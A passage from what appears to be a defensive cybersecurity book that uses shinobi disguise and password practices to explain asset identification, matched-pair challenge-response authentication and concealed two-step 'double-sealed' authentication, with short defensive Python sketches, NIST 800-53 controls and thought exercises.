While in disguise around people of the same job, class, or caste, shinobi were advised to demonstrate enough knowledge to appear believable in the profession but also to act dumb and in need of help to perform common tasks. Feigning ignorance served to deceive a target about the shinobi's true intelligence while flattering the target's own, causing them to lower their guard and offer information freely. The Ninpiden lists specific targets shinobi should attempt to win over with these tactics, such as local deputies, magistrates, doctors, monks, and others who may work in the presence of the local lord or authority. These targets typically had information valuable to the mission.3

Note that the social hierarchies of the medieval Japanese village resemble the privilege ring structure in modern computer systems, or even the layered segmentation of computer networks in which the outside layers, like a DMZ, are the least trusted. Likewise, normal villagers (the least privileged) would be unable to interact with the lord, who is at the center, or ring0.

We can apply the way shinobi identified likely targets to a cybersecurity context. Just as shinobi targeted those who were, metaphorically, closer to ring0 or who had access to ring0, so will modern threat actors target privileged classes of systems/users. Thus, defenders should consider what the computer equivalents of such high-status individuals as monks and magistrates are in their systems. Furthermore, you should consider what disguises a modern threat actor might use to approach the more privileged systems/users.

The Problem with Interoperability and Universal Standards

Whether they consciously think about it or not, interoperability is a top priority for technology consumers: people expect their devices, apps, systems, and software to work seamlessly with new and old versions and across different platforms, as well as interchangeably with other makes and models. The International Organization for Standardization (ISO), the International Electrotechnical Commission (IEC), the Internet Engineering Task Force (IETF), the Internet Society (ISOC), and other governing bodies have established widely agreed-upon standards for how technology is designed and should operate and integrate.

These efforts have produced many of the ISO standards, Request for Comments (RFC) documents, and other interoperability protocols that make computers more accessible, not to mention easier to build, manage, diagnose, repair, program, network, and run. A prime example is the Plug and Play (PnP) standard introduced in 1995, which directs a host system to detect and accept any foreign device plugged into it via USB, PCI, PCMCIA, PCIe, FireWire, Thunderbolt, or other means and then autoconfigure, load, install, and interface automatically.

Unfortunately, when the goals are to establish functionality and maintain its operability, security is almost never a priority. In fact, the PnP standard—which facilitates the trust and acceptance of unfamiliar entities—was built to the exact opposite of the xenophobic security standard held by the medieval Japanese. For example, an unfamiliar system can connect to a network as an outsider and request an IP address from Dynamic Host Configuration Protocol (DHCP), ask for directions from the local router, query the authoritative DNS server for the names of other devices, and obtain local information from Address Resolution Protocol (ARP), Server Message Block (SMB), Web Proxy Auto Discovery (WPAD), and other protocols designed to ease the burden of compatibility. You plug the system into the network and it works, demonstrating behavior users expect and desire. However, the cybersecurity industry would benefit from being more "xenophobic" in its networking protocols.

To mitigate weaknesses resulting from PnP-like accessibility, security controls such as Network Access Control (NAC) and Group Policy Objects (GPO) have been introduced. On host systems, these technologies safeguard against potentially malicious foreign devices that physically connect to internal networks or systems.

NACs typically lock down the DHCP, assigning unrecognized computers to guest IP subnets or unprivileged VLANs. This allows foreign systems to connect to the internet for general access but segments them from the rest of the trusted network. Such behavior is especially desirable for conference rooms and lobbies so that external business partners and vendors can operate without exposing the network to threats.

GPO on local hosts enforces what types of devices—external hard drives, USBs, media readers, and the like—can be configured and installed on a system. GPO can even whitelist known applications within an organization while simultaneously blocking all unfamiliar software from downloading or installing on the host system.


However, these security controls are notable exceptions. From RJ45 Ethernet jacks using the EIA/TIA-561 and Yost standards to packet-based networking using the IEEE 802 standards—and everything in between—most technologies are built with transparent, widely known, default standards that ensure quick and easy use across foreign systems and networks, leaving them vulnerable to unauthorized rogue systems that may conduct network discovery, reconnaissance, sniffing, and communication.

Developing Unique Characteristics for Your Environment

Having unique properties and characteristics in your IT inventory will help to distinguish your assets from rogue assets that may enter your environment and even protect your network from compromise. These characteristics are observable through inspection or analysis, but their use should not be publicly disclosed, as such disclosure would defeat the countermeasures. Most elements within modern IT systems and software are configurable, and such configuration changes effectively create a xenophobic IT model in your systems.

Recently introduced commercial products that use a zero-trust model can help make your network or systems "xenophobic" to unfamiliar systems, software, and devices through a combination of technical protocols and distrust. Strict whitelists and authentication/authorization procedures can achieve similar results, but a proper solution would introduce a computer version of "dialects"—settings, customs, and other unique characteristics that deviate from universal computing standards. Systems or devices connecting to your internal network would need to be "indoctrinated" to the unique culture of your organization, while unindoctrinated servers, components, networking devices, and protocols would distrust or reject the unfamiliar foreign agent and alert the security team to its presence.

With some creativity and engineering, these cultural computer identifiers could be implemented at any layer of the Open Systems Interconnection (OSI) model (application, presentation, session, transport, network, data link, physical) to identify network outsiders and provide an additional layer of defense against adversaries. Whether it's transposing certain wires in hidden adapters of RJ45 jacks, expecting secret handshakes (SYN, SYN-ACK, ACK-PUSH) at the TCP/IP level, or using reserved bits in the Ethernet header, a xenophobic solution should be modular, customizable, and unique per instance.
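To make the dialect idea concrete at the application layer, here is a minimal sketch, using only the Python standard library, of a service that rejects any client that does not speak your organization's private handshake before the real protocol begins; the greeting, reply, and port are hypothetical:

    import socket

    SECRET_GREETING = b"snow"       # challenge unique to your environment
    EXPECTED_REPLY = b"mount-fuji"  # reply only indoctrinated clients know

    def serve(host: str = "127.0.0.1", port: int = 9000) -> None:
        with socket.create_server((host, port)) as srv:
            while True:
                conn, addr = srv.accept()
                with conn:
                    conn.sendall(SECRET_GREETING)
                    reply = conn.recv(64)
                    if reply.strip() != EXPECTED_REPLY:
                        # Unfamiliar dialect: reject and alert the security team.
                        print(f"ALERT: unindoctrinated peer {addr[0]} rejected")
                        continue
                    conn.sendall(b"welcome\n")  # proceed with the real protocol

    if __name__ == "__main__":
        serve()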


CASTLE THEORY THOUGHT EXERCISE

Consider the scenario in which you're the ruler of a medieval castle with valuable assets within. You notice that one of the local fishermen, who sells fish to your cooks, preserves the fish in an unfamiliar fashion and has a strange dialect. When asked about his unique storage methods, he claims he does it that way because the fish tastes better. He doesn't have a surname you recognize.

What culturally unique identifiers could you use to determine whether the fisherman is an outsider, and how might you apply that test? If the fisherman claimed he was born in your village but temporarily moved away, how would you verify his story? If you couldn't verify his story and suspected him of being a spy, how would you manage the threat without exiling or executing a potentially innocent fisherman? To answer these questions, you'll need to consider three scenarios: the fisherman is indeed a spy, the fisherman is not a spy, and the fisherman's purpose is impossible to know. You can ask a partner to play the part of the strange fisherman by secretly choosing one of the roles beforehand, or you can play both roles of interrogator and fisherman in your head.

This exercise helps you think deeply about asset identification using xenophobic mental models while avoiding technical discussions of computer standards and inventory control. While the scenario is fictitious, shinobi likely disguised themselves as fishermen sometimes, as such a cover would give them an excuse to loiter for hours, chat with locals, and perform reconnaissance on targets.

Recommended Security Controls and Mitigations

Where relevant, the following recommendations are presented with an applicable security control from the NIST 800-53 standard. Each should be evaluated with the concept of xenophobic security in mind.

1. Inspect systems to determine whether their specifications or requirements deviate from the previously agreed-upon baseline configuration. [CM-2: Baseline Configuration]
2. Maintain documentation of all information systems in your organization so you can more readily identify foreign systems in your environment. [CM-8: Information System Inventory]
3. Use encrypted information, embedded data, special data types, or metadata (for example, padding all packets to be a certain size) as special identifiers in communications so that filters can identify and restrict unfamiliar traffic. [AC-4: Information Flow Enforcement; SA-4: Acquisition Process]
4. Restrict the implementation and knowledge of xenophobic identifiers to newly acquired systems and devices. [SA-4: Acquisition Process]
5. Embed xenophobic inspection as a security control for identifying and authenticating systems and devices in your organization. [IA-3: Device Identification and Authentication]

Debrief

This chapter described the historically xenophobic environment for shinobi, which required the investment of time and effort, as well as advanced techniques, to perform preparatory reconnaissance using open disguise tactics before actual target reconnaissance could begin. You learned the concept of anti-privilege and how to create unique internal characteristics to identify rogue assets or users in your environment. Now you may be able to identify key resources or people in your environment who are likely targets you perhaps hadn't considered as attack vectors in previous threat-modeling exercises, and you can then consider the systems or accounts that work closely with these potential targets.

However, by using the correct insignia, clothing, hairstyle, accent, and other characteristics, shinobi could evade the xenophobic inspections detailed in this chapter. Therefore, in the next chapter, we'll explore the matched-pair security technique historically used by Japanese lords to detect shinobi who might otherwise infiltrate their fortification by using a disguise.

4
IDENTIFICATION CHALLENGE

Though there are ancient ways for identifying marks, passwords, and certificates, unless you invent new ones and rotate them, the enemy will manage to infiltrate by having similar fake ones.

During a night attack, you may have the enemy follow you and get into the ranks of your allies. To prevent this, have a prearranged policy—a way to identify your allies.

—Yoshimori Hyakushu #27

Imagine the following historical scenario: after dispatching a large group of troops on a night raid, a military commander must open the gates to allow them back inside their fortification. Night raids helped win battles, but they also presented opportunities for a counterattack. An enemy shinobi could forge or steal a uniform from the attacking troops and blend into their formation as they returned to their base.

To combat this threat, commanders implemented a onetime password for the raiders to use before they could pass through the gate—but this password was easily defeated: the disguised shinobi would overhear the password when it was spoken by the soldier ahead of them in line. So commanders tried other identification methods. Some required the raiders to all wear underwear of a certain secret color that could be inspected upon their return, but clever shinobi would carry or wear undergarments in multiple colors, then selectively pull back layers of underwear so only the correct color would be visible during inspection. Additional countermeasures included changing passwords multiple times per day (which still didn't prevent a shinobi from overhearing the current password) and unique uniform insignia or tokens (which a shinobi could steal from the corpse of a dead soldier after the raid).

The shinobi categorized these techniques as either the art of open disguise (yo-nin, which translates literally to "light shinobi") or the art of hidden infiltration (in-nin, which translates literally to "dark shinobi"). In this case, open refers to being plainly visible; for example, the attacker could wear the uniform of a defending soldier, fully expecting to be seen. Hidden, on the other hand, refers to trying not to be seen, such as by using camouflage or blending into the shadows. Many of the assorted open disguise techniques described in Bansenshūkai could be used both offensively and defensively. Shinobi knew not only how to use these techniques for their own attacks but also how to spot enemy infiltrators. It was common for spies to replicate uniforms and crests or overhear passwords, so shinobi developed identification countermeasures to distinguish their allies from enemies.

One such identification technique was matched pairs, word combina-

tion challenges used to authenticate allies.1 This technique is also known

as countersigns or challenge-response authentication. The matched-pairs tech-

nique worked as follows: an unidentified person approached a guard at

the gate of a castle and requested entry. The guard first checked to ensure

that the stranger was wearing the correct uniform and bearing the proper

crest. If they were, then the guard uttered a word—“tree,” for example.

If the stranger did not respond with the correct prearranged match—

“forest”—the guard knew they were dealing with an enemy. While the

Bansenshūkai states that matched-pair phrases should be simple enough

that “lower-rank” people can remember them, it advises against using

common associations that an adversary might guess. So, instead of “snow”

and “mountain,” a more desirable pair might be “snow” and “Mount Fuji.”

The scroll recommends that shinobi work with commanders to generate

100 different pairs of matching words every 100 days and use a new pair

every day.2 This large number of matching pairs would allow a sentry to

rotate randomly through the list (if necessary) as each troop approached,

making it unlikely that a disguised enemy could overhear the answer to

the challenge word they would receive.
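
To make the rotation mechanics concrete, here is a minimal Python sketch of a matched-pair verifier in the spirit of the scroll's guidance: a large pool of prearranged pairs, one selected per day, with the response compared in constant time. The pair list and selection scheme are illustrative assumptions, not a prescribed implementation.

```python
import secrets
from datetime import date

# Illustrative pool of prearranged pairs; the scroll's guidance would
# call for ~100 pairs regenerated every 100 days.
MATCHED_PAIRS = {
    "snow": "mount fuji",
    "tree": "forest",
    "river": "carp banner",
}

def todays_challenge() -> str:
    """Rotate to a new challenge word each day."""
    words = sorted(MATCHED_PAIRS)
    return words[date.today().toordinal() % len(words)]

def verify(challenge: str, response: str) -> bool:
    """Check the prearranged match without leaking timing information."""
    expected = MATCHED_PAIRS.get(challenge, "")
    return secrets.compare_digest(expected, response.strip().lower())

# A disguised infiltrator guessing the common association fails:
assert verify("tree", "forest")
assert not verify("snow", "mountain")
```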


Matched pairs were used to reveal possible infiltrators. If the stranger

answered the challenge incorrectly, they were quickly detained, interro-

gated, and possibly killed. Knowing these consequences, Bansenshūkai rec-

ommends that shinobi attempting to infiltrate an enemy camp style their

appearance, behavior, and speech as that of a slovenly or lower-class sol-

dier. This way, if they were asked to answer a matched-pair challenge they

didn’t know, they could convincingly claim ignorance.3 Some readers may

note that their financial institution has started implementing matched-

word or image pairs for online authentication. However,

these websites do not require 100 different pairs and do not update them

frequently, if at all. A small pool of static matched pairs makes it possible

for an adversary to observe all the pairs and then perform unauthorized

actions with the stolen authentication responses.

These historical examples underscore the challenges in trying to

safeguard authentication from an advanced and dynamic adversary. In

this chapter, we will touch on how difficult it can be to prove your iden-

tity, along with the various factors used in information assurance (IA) to

authenticate someone’s identity. I will mention some of the techniques

that modern cyber threat actors use to thwart the best efforts to authen-

ticate only the correct people and highlight analogous shinobi tactics

that illustrate why authentication will be a challenge for the foreseeable

future. I will also provide readers with guidance on how they might apply

shinobi authentication techniques to modern applications. The overall

goal of this chapter is to help readers grasp the essential issues involved

in this identification problem rather than getting lost in the expansive

knowledge domain that authentication and cryptography have become.

Understanding Authentication

Authentication is the process of confirming a user’s identity before grant-

ing access to information systems, data, networks, physical grounds, and

other resources. Authentication processes confirm user identities by ask-

ing for something the user knows, something the user has, or something

the user is. For example, an authenticator might ask for a password (some-

thing the user knows), a token (something the user has), or a biometric

(something the user is). Depending on the level of security necessary,

organizations require single-factor, two-factor, or multifactor authentication.

Mature organizations might also use strong authentication, which

uses multiple layers of multifactor credentials. For example, the first

step of strong authentication might require a username, password,

and fingerprint, while the second step authenticates with a token and

a onetime code sent over SMS. Increasingly, industry professionals are


contemplating the feasibility of a fourth factor, such as a trusted person

in the organization who would confirm the user’s identity. Interestingly,

the matched-pair shinobi scenario starts with this test; the challenge is

used only if no one in the area can validate the stranger’s identity.

Authentication failure is a critical security flaw. Users’ authenticated

identities are tied to permissions that allow them to perform specific,

often privileged, actions. An adversary who successfully piggybacks

on a valid user’s authenticated connection has free access to the user’s

resources and can conduct malicious activities on information systems,

data, and networks.

Unfortunately, the authentication process is imperfect. Despite a

slew of cyber authentication measures, it’s currently not possible to verify

the identity of a user or process with complete certainty, as nearly every

existing verification test can be spoofed (spoofing is the use of false data

to impersonate another entity) or compromised. Adversaries use numer-

ous techniques to steal passwords, intercept tokens, copy authentication

hashes or tickets, and forge biometrics. If attackers gain unauthorized

access to identity management systems, such as domain controllers,

they can create and authenticate to fraudulently forged accounts. After

users authenticate, their identities are rarely challenged during a session,

unless password reentry is required to conduct privileged tasks. Similarly,

shinobi in disguise could wander around the inside of a castle without

being challenged—in both cases, it’s assumed those inside have been

authenticated.

Security technologies are evolving to fight authentication threats. One

emerging solution, called continuous authentication or active authentication,

constantly verifies user identities after the initial login. However, because

continuous authentication dialogs


might hinder the user experience, tech-

niques are also being developed to monitor authentication through typing

style, mouse movement, or other behavioral traits associated with user

identities. Such techniques would catch adversaries who were physically

accessing logged-in systems that had been left unattended, locking them

out. This would also work with unauthorized remote access methods,

such as Remote Desktop Protocol (RDP) sessions. Such techniques could

identify attackers even if they used valid credentials and authenticators to

log in. Of course, a person’s behavior may change. Moreover, even specific

behaviors can be mimicked or simulated by sophisticated adversaries by

incorporating user behavior reconnaissance into their attacks.
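
As a toy illustration of behavioral continuous authentication, the sketch below scores a live session's typing rhythm against an enrolled profile of inter-keystroke intervals and flags large deviations. The profile format and the three-sigma threshold are assumptions for demonstration, not a production biometric.

```python
from statistics import mean, pstdev

def keystroke_anomaly_score(profile: list[float], observed: list[float]) -> float:
    """Return how many standard deviations the session's mean
    inter-keystroke interval deviates from the enrolled mean."""
    mu, sigma = mean(profile), pstdev(profile) or 1e-9
    return abs(mean(observed) - mu) / sigma

enrolled = [0.21, 0.19, 0.23, 0.20, 0.22, 0.18]  # seconds between keystrokes
session = [0.45, 0.50, 0.48, 0.47]               # live RDP session sample

if keystroke_anomaly_score(enrolled, session) > 3.0:
    print("Behavioral mismatch: lock the session and re-challenge the user")
```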

One possible implementation of the matched-pair model involves a

human-machine interface that uses passive brainwave sensors connected

to a system that verifies identity based on how the user thinks. Research

demonstrates that humans generate unique brain patterns when they


see an object with which they have interacted before or have a specific

thought association. As such, showing a user controlled stimuli (such as

matched-pair word or image combinations), monitoring the brain’s elec-

trical responses, and matching them to a user profile could accurately

authenticate the user. With enough unique challenge pairs dynamically

generated with stylized permutations, it’s unlikely that adversaries could

replay or simulate a user’s brainwave activity when prompted.

In the next section, we’ll discuss some techniques you can use for

matched-pair authentications.

Developing Matched-Pair Authenticators

Following are a few suggestions for developing matched-pair authentica-

tors and ideas for applying them.

Work with the right commercial authentication vendors. Seek out

vendors that use challenge phrase authentication that is distinct from

a user’s password, account name, or other identifying information

that an adversary could compromise. While some financial organi-

zations use matched-pair challenge phrases before they authorize

account changes, unfortunately this method is typically used only

when the user reports they’ve lost or forgotten their password, and

the challenge phrases are static and don’t change.

Develop new authentication systems. An authentication product

might integrate with identity controls to present a matched-pair

challenge to an authenticated user whenever they attempt to perform

privileged actions, such as admin/root/system commands. Under this

protocol, even if adversaries observed one or several challenge pairs,

their request to perform privileged actions would be denied.

An ideal product uses two forms of matched-pair challenges:

daily and user preset. The daily challenge, disseminated nondigitally

in areas that are visible only to authorized personnel, challenges

on-premise authentication requests with a word or image and asks

the user to respond with the match. All other employees, including

remote/VPN employees, establish a large set of matching word pairs

that are not likely to be forgotten or misinterpreted. The organiza-

tion chooses the pairs at random or rotates them to quickly pinpoint

unauthorized users that have been authenticated on the network.

(Note that to prevent an adversary from inserting their own matched

pairs for compromised or spoofed credentials, there must be secured

transmission, storage, and auditing of new matched pairs to the

active challenge system.) Consider using a one-way interface to insert

matched pairs in a secure controlled information facility (SCIF) or


segmented room that requires manual authentication and authoriza-

tion to enter and use. Other mechanisms could allow organizations to

ambush an unidentified user by requiring access to their microphone,

camera, location, running processes, running memory or cache, desk-

top screenshot, and other information on their connecting system,

thereby better identifying the origin and identity of the threat.
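
The sketch below illustrates how such a product might interpose a matched-pair challenge in front of privileged actions, so that even an authenticated session must answer before an admin command runs. The decorator, pair store, and command are hypothetical names for illustration.

```python
import functools
import secrets

# Hypothetical per-user store of preset matched pairs.
USER_PAIRS = {"alice": {"lantern": "firefly", "snow": "mount fuji"}}

def require_matched_pair(func):
    """Challenge the already-authenticated user before any privileged action."""
    @functools.wraps(func)
    def wrapper(user, *args, **kwargs):
        challenge = secrets.choice(sorted(USER_PAIRS[user]))
        response = input(f"Challenge [{challenge}]: ").strip().lower()
        if response != USER_PAIRS[user][challenge]:
            raise PermissionError("Matched-pair challenge failed; action denied")
        return func(user, *args, **kwargs)
    return wrapper

@require_matched_pair
def rotate_backup_keys(user):
    print(f"{user}: privileged action authorized")
```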

CASTLE THEORY THOUGHT EXERCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets within. You successfully complete a raid on an enemy army

and return to your castle. A soldier in your army wishes to approach you and

present the severed head of an enemy commander you defeated in battle, as

is traditional. This warrior wears your uniform and displays the correct crest,

knows the password of the day, appears to know their way around the inte-

rior of your castle, and waits for permission to enter your inner stronghold to

pay their respects.

Consider how you might handle suspicious individuals who pass normal

authentication checks requesting privileged access. What existing security

protocols or authentication processes would help you determine whether this

warrior is an enemy shinobi in disguise who intends to do you harm? Other

than outright rejecting the warrior’s request, how might you mitigate the risk if

you cannot verify their identity?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with an applicable secu-

rity control from the NIST 800-53 standard. Each should be evaluated in

the context of matched-pair identification and authentication challenge

responses.

1. Implement session locks after set periods of time for privileged

accounts, upon privileged user requests, or in reaction to suspi-

cious behavior. Only reestablish access after the user provides

a matched-pair challenge response. (A session lock may be

preferable to a normal password lock because the challenge

pair match is a single click or a simpler word than the user’s

account password.) [AC-11: Session Lock; IA-2: Identification

and Authentication (Organizational Users) | (1) Network Access

to Privileged Accounts | (3) Local Access to Privileged Accounts;


IA-10: Adaptive Identification and Authentication; IA-11:

Re-Authentication]

2. Identify, document, and enforce security controls on which

user actions may be performed on a system without passing the

matched-pair challenge response—for example, contacting

technical support or making emergency calls. [AC-14: Permitted

Actions Without Identification or Authentication]

3. Develop matched-pair authentication processes that are resistant

to replay attacks by establishing large sets of onetime challenge

response authenticators. [IA-2: Identification and Authentication

(Organizational Users) | (8) Network Access to Privileged

Accounts—Replay Resistant]

4. Capture information that uniquely identifies user devices

requesting authentication to gain intelligence on unidentified

adversaries who fail the matched-pair challenge response. [IA-3:

Device Identification and Authentication | (4) Device Attestation]

5. Require in-person matched-pair input to mitigate compromise

of the challenge response identification system. [IA-4: Identifier

Management | (7) In-Person Registration]

6. Physically and logically segregate the matched-pair challenge

response system and enforce strict access controls to safeguard

it against compromise. [IA-5: Authenticator Management | (6)

Protection of Authenticators]

Debrief

This chapter highlighted the challenges faced by commanders who

needed to verify the identity of their troops to prevent disguised shinobi

from infiltrating their fortifications. You learned about the matched-

pair identification technique, both how it was used by shinobi to detect

enemies and what safeguards shinobi took against the technique when on

the offensive. You also saw the modern analogs of this technique in com-

puter security authentication and identification.

In the next chapter, you will use your understanding of authentica-

tion factors and historical challenge response to learn how two-step

authentication is different from but complementary to matched pairs.

I will discuss a concealed shinobi authentication technique, the double-

sealed password, which can be used to detect sophisticated infiltrators.

5

DOUBLE-SEALED PASSWORD

Sometimes, a set of signs such as pinching the nose or

holding the ear should be used with these passwords.

Aikei identifying signs include techniques of

tachisuguri isuguri—that is, standing and sitting

while giving passwords.

—Bansenshūkai, Yo-Nin II

Both Bansenshūkai and the Gunpo Jiyoshu scrolls describe

an open-disguise detection protocol supposedly devised

by 14th-century samurai Kusunoki Masashige.1 Tachisuguri

isuguri signal techniques use gestures, posture, or body

positioning as a secret authentication factor, thus adding

a layer of security to the password verification process.

These techniques form what’s called a double-sealing2 pass-

word system, designed to catch disguised enemy shinobi,

even if they could pass other authentication challenges

with stolen passwords, identifying marks, and correct

challenge response words.


In the most common example of tachisuguri isuguri, a person

bearing the correct uniform and crest approaches a gate for entry. Not

recognizing the stranger, the guard chooses to either sit or stand, then

whispers a challenge word. If the visitor is an ally who has been briefed

on the tachisuguri isuguri identification protocol, they perform the pre-

arranged corresponding action in response—a non-obvious signal such

as touching their nose or ear—and whisper the matching code word. The

guard permits entry only if the stranger answers with both the correct

code word and the correct physical movement. (There may be multiple

ways to implement tachisuguri isuguri besides having the guard stand or

sit, but unfortunately those methods are believed to be recorded in the

Teikairon scroll, a lost supplemental section of Bansenshūkai.)3

The simple brilliance of this technique is that the act of standing or

sitting is usually not given a passing thought. Even a malicious observer

trying to impersonate authorized personnel would likely fail to notice

this second, silent challenge response. They may watch 100 people enter

a gate using the same passphrase while the guard sits (because he rec-

ognizes them all), and thus they will not see how the interaction differs

when the guard stands. Tachisuguri isuguri was successful enough that

even other shinobi did not have adequate countermeasures to thwart it,

though Bansenshūkai instructs shinobi to mirror what guards do and say

at all checkpoints, even if the guards seem to be acting without conscious

intent;4 if nothing else, this could confuse the guard into believing the

shinobi is disorganized or simply stupid. The scrolls also provide this

helpful advice to any shinobi who fails an unknown tachisuguri isuguri

challenge: either think fast and talk fast—or run for your life.5

While the shinobi scrolls are not explicit in their definition of double-

sealing and I have no evidence that the following hypothetical example

actually occurred, I still feel it’s a plausible illustration of the concept.

Seals, often impressed into wax, have been used since ancient times

to secure the content of a letter or scroll. Ideally, each sender of com-

munications had a unique metal stamp and so was the only person who

could make a particular mark, thus verifying a document’s authenticity.

In addition, if anyone other than the intended recipient were to open

the letter or scroll, the seal would break, indicating that tampering had

taken place.

However, spies learned that with special heating techniques, they

could loosen the wax, remove the seal intact without harming the paper,

read the missive’s contents, and then reseal the original document or

affix the seal to a newly forged document that included misinformation.

A counter to the technique of melting the paper side of the wax seal may

have been to “double-seal” the wax. Imagine that instead of a single metal


stamp, the author used a clamp or vice-like device with both a front and

back stamp. The underside of the wax wafer would be given a hidden seal

on the back of the paper that could be inspected only by ripping

the document open. Attempts at melting the seal off the paper might pre-

serve the top seal but would destroy the second hidden seal, thus making

the communication double-sealed.

You can see why double-sealing was adopted as an effective counter-

measure against attempts to penetrate a single seal and how it helped

detect the activity of enemy shinobi. In this chapter, I will note the differ-

ence between two-factor authentication and second-step authentication.

I’ll also discuss how a modern second-step authenticator could be double-

sealed to improve its effectiveness. I will then describe what I believe are

the requirements and criteria for implementing double-sealed passwords,

along with implementations that use existing authenticators and technol-

ogy. My hope is that after performing the thought exercises and seeing

my examples for implementations of double-sealed passwords, you will

appreciate the genius of Kusunoki Masashige and try this highly intuitive

idea out yourself.

A Concealed 2-Step Authentication

Increasingly, more cyber authentication and identification protocols

require a layer of security on top of a password. This is called 2-step

authentication: the second step requires a user to perform an additional

authentication action, such as providing a secret code or clicking a button

on an out-of-band device (that is, one not involved in the rest of the authen-

tication process). Note the slight difference from last chapter’s two-factor

authentication, which is used to prevent an adversary from accessing an

account with stolen login credentials.

While the secret code (second step) can be randomized through

software applications, it is typically generated each time using the same

procedure. Unfortunately, this procedural rigidity gives adversaries a

number of opportunities to compromise 2-step authentication methods.

For example, a 2-step authentication code is typically sent in a cleartext,

unsecured message that can be intercepted via phone cloning. In this

case, a user who receives the code 12345 and enters that sequence at the

passcode prompt also inadvertently provides the code to the adversary.

The device used to authenticate—often a phone—can be stolen, hijacked

via call forwarding, or cloned and used by the adversary to complete the

authentication. Similarly, the out-of-band device established for deliver-

ing 2-step codes could be lost or stolen and used to bypass the authentica-

tion process, allowing the adversary to steal user-provided backup codes.


A 2-step code that was double-sealed with a tachisuguri isuguri

technique could mitigate some of the weaknesses inherent in authenti-

cation procedures. Each user should be able to establish a prearranged

tachisuguri isuguri identifier that is unique and meaningful to them. For

instance, suppose a user has been instructed, either orally or by another

secure method, to transpose the digits in their 2-step code across the

number 5 on the keypad—1 becomes 9, 2 becomes 8, and so on6—but

only when the code displays in red font rather than the normal green.

This color change is the silent tachisuguri isuguri factor, triggered when

the system finds the authentication request suspicious due to the odd

hour, an unrecognized device or different IP address making the request,

or other criteria. (To conceal it from adversaries who may be observing

logins, this protocol should not be used too frequently.) Now, when the

legitimate user receives the red code 12345, they know to respond 98765,

while an adversary who has stolen the user’s credentials but is not aware

of the concealed rule enters 12345. This halts the authentication pro-

cess, flags the account


for investigation, and adds a 2-step authentication

failure to the session. The 2-step authenticator then sends a hint—“Use

authenticator protocol #5,” perhaps along with another red code, such

as 64831 (to which the user should respond 46279). Another incorrect

response triggers further alerts or account lockout.
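
The transposition rule above amounts to reflecting each digit across 5 on the keypad, that is, mapping each digit d to 10 - d (5 maps to itself). A minimal sketch; leaving 0 unchanged is my assumption, since the chapter's examples never include it:

```python
def transpose_across_five(code: str) -> str:
    """Reflect each digit across 5 on the keypad: d -> 10 - d.
    0 is left unchanged as an assumption; the chapter's examples omit it."""
    return "".join(d if d == "0" else str(10 - int(d)) for d in code)

# The two codes used in the chapter's example:
assert transpose_across_five("12345") == "98765"
assert transpose_across_five("64831") == "46279"
```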

Developing Double-Sealed Passwords

A double-sealed security solution that integrates with industry-standard

authorization controls would do the following:

1. Be used only when the user’s identity is suspect, such as when users:

• Log in from a new device, location, IP address, or time window

• Report that their mobile device has been stolen or

compromised

• Lose their backup token, code, or password and need to reset

their password

2. Use an out-of-band or side-channel communication method.

3. Use a secret, rule-based knowledge factor. Each user should be able

to customize the protocol to create a unique set of concealed rules.

4. Leverage authentication factors that are easy to understand and

remember, yet not obvious.

5. Allow rules to be stacked on top of each other in the case of

wrong consecutive guesses or enough time passing between

authentication attempts.


6. Enable the restriction, freezing, or locking out of an account that

has failed authentication too many times. Most applications have

a lockout after consecutive wrong passwords but not consecutive

wrong 2-step authentication attempts. (A minimal flow combining

several of these criteria is sketched after this list.)

7. Not be described in any help desk SOPs or other documentation.

Employees should also refrain from talking openly about the

double-sealed security layer.
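
Here is a minimal sketch combining several of the criteria above: the concealed rule fires only for suspicious sessions, a second stacked rule is tried after a failure, and repeated 2-step failures lock the account. The rule functions, thresholds, and code format are illustrative assumptions.

```python
import random

def make_code() -> str:
    return f"{random.randrange(100000):05d}"

# Each user secretly memorizes an ordered stack of concealed rules.
RULES = {
    "alice": [
        lambda c: "".join(ch if ch == "0" else str(10 - int(ch)) for ch in c),
        lambda c: c[::-1],  # fallback rule, hinted at after one failure
    ]
}

def double_sealed_login(user: str, suspicious: bool, answer) -> bool:
    """Run the 2-step exchange; lock out after two concealed-rule failures."""
    code = make_code()
    if not suspicious:
        return answer(code) == code  # the ordinary 2-step path
    for rule in RULES[user]:
        if answer(code) == rule(code):
            return True
        code = make_code()  # reissue a code under the next stacked rule
    print(f"Account {user} locked: consecutive 2-step failures")
    return False

# A credential thief who types the code back verbatim is caught:
double_sealed_login("alice", suspicious=True, answer=lambda c: c)
```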

Popularizing double-sealed security requires designers, engineers,

and users to explore what is technically feasible and apply creative

thinking. For example, consider the various input variations that can

be used on existing mobile devices with a 2-step authentication app and

require only that the user press Yes or No buttons to verify their iden-

tity. Following are some examples to demonstrate the range of possible

responses when the user is given the tachisuguri isuguri signal in their

2-step authentication app:

1. The user rotates their screen upside down before select-

ing Yes, and the app performs a silent inspection of

the DeviceOrientation status to test whether it equals

portraitUpsideDown.

2. The user manipulates the physical volume buttons on the mobile

device to set the OutputVolume to 0.0 (silent) or 1.0 (max) before

selecting Yes, and the app performs a silent get of the volume

float value to test whether it matches the intended value.

3. The user waits to select Yes until they observe the mobile

device clock roll over to the next minute, when they immedi-

ately select Yes. The app performs a silent timestamp request

to compare the time of selection to HH:MM:0X, where X is less

than 3 seconds.

4. The user uses excessive pressure when selecting Yes on the mobile

device, and the app performs a silent get of the UITouch.force

of the event to determine whether it was greater than a preset

threshold.

5. The user performs multiple quick taps of the Yes button on the

mobile device, and the app performs a silent get of the tapCount of

the UIEvent to determine whether it is greater than 1.

6. The user performs a gesture while selecting the Yes button

on the mobile device, and the app performs a silent get of the

UIGestureRecognizer to determine whether it was a Pinch, LongPress,

Swipe (up, down, left, right), or Rotation.


CASTLE THEORY THOUGHT EXERCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets within your stronghold. You've been told that your identify-

ing marks, crests, secret signals, and other identification methods have been

disclosed to enemy shinobi, who can replicate them and gain entry to your

castle. You already change these passwords and signs three times a day, but

you are told that shinobi can keep up with these changes, even though you

are unsure how.

Consider how you might implement tachisuguri isuguri to catch enemy

shinobi. Could you create nonbinary tachisuguri isuguri—in other words, con-

cealed rules more complex than sitting or standing? How would you protect

the tachisuguri isuguri authentication process to prevent the enemy shinobi

from learning it? How could you layer tachisuguri isuguri to perform a test for

operational security leaks among your personnel?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with an applicable secu-

rity control from the NIST 800-53 standard. Each should be evaluated in

terms of 2-step (double-sealed) authentication.

1. Utilize Out-of-Band Authentication (OOBA) through a separate

